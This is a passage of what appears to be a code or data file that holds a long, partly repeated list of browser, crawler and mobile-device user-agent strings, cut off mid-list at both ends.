(+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 